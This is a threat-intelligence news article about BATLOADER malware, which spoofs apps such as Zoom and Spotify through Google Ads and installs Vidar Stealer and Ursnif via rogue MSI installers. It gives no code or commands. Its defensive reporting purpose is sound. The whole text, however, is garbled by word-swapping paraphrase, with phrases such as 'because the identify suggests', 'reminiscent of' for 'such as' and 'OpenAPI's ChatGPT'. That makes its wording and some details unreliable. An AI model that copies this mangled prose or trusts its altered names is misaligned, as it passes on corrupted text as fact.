BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads

Mar 11, 2023Ravie LakshmananCyber Threat Intelligence

The malware downloader generally known as BATLOADER has been noticed abusing Google Ads to ship secondary payloads like Vidar Stealer and Ursnif.

According to cybersecurity firm eSentire, malicious adverts are used to spoof a variety of reputable apps and providers reminiscent of Adobe, OpenAPI’s ChatGPT, Spotify, Tableau, and Zoom.

BATLOADER, because the identify suggests, is a loader that is liable for distributing next-stage malware reminiscent of info stealers, banking malware, Cobalt Strike, and even ransomware.

One of the important thing traits of the BATLOADER operations is the usage of software program impersonation ways for malware supply.

This is achieved by establishing lookalike web sites that host Windows installer information masquerading as reputable apps to set off the an infection sequence when a consumer looking for the software program clicks a rogue advert on the Google search outcomes web page.

These MSI installer information, when launched, execute Python scripts that include the BATLOADER payload to retrieve the next-stage malware from a distant server.

This modus operandi marks a slight shift from the earlier assault chains noticed in December 2022, when the MSI installer packages had been used to run PowerShell scripts to obtain the stealer malware.

Other BATLOADER samples analyzed by eSentire have additionally revealed added capabilities that permit the malware to determine entrenched entry to enterprise networks.

“BATLOADER continues to see modifications and enchancment because it first emerged in 2022,” eSentire stated.

“BATLOADER targets numerous in style purposes for impersonation. This isn’t any accident, as these purposes are generally present in enterprise networks and thus, they’d yield extra invaluable footholds for monetization by way of fraud or hands-on-keyboard intrusions.”